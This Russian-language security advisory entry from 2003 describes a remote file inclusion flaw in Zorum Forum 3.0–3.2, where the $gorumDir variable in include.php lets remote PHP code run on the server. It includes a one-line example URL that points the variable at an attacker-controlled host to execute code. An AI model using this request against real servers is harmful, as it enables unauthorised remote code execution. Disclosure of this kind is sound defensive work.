| Дата публикации: | 28.01.2003 |
| Всего просмотров: | 4096 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | PhpOutsourcing's Zorum – небольшой форум для UNIX и Windows систем. Файл 'include.php' включает несколько других PHP файлов, используя переменную '$gorumDir'. Удаленный пользователь может создать URL, который в переменной '$gorumDir' ссылается на PHP файл, расположенный на удаленном сервере. Код, содержащийся в этом файле, будет выполнен в контексте уязвимого сервера. PHP код может включать команды оболочки операционной системы. Уязвимые переменные используются в следующих файлах: generformlib_multipleselection.php generformlib_groupselection.php generformlib_filebutton.php group.phpПример: http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker ]/выполнится код в файле: 'http://[attacker]/group.php'Уязвимость обнаружена в Zorum Forum 3.0, 3.1, 3.2 |
| Ссылки: | Zorum Portal (PHP) |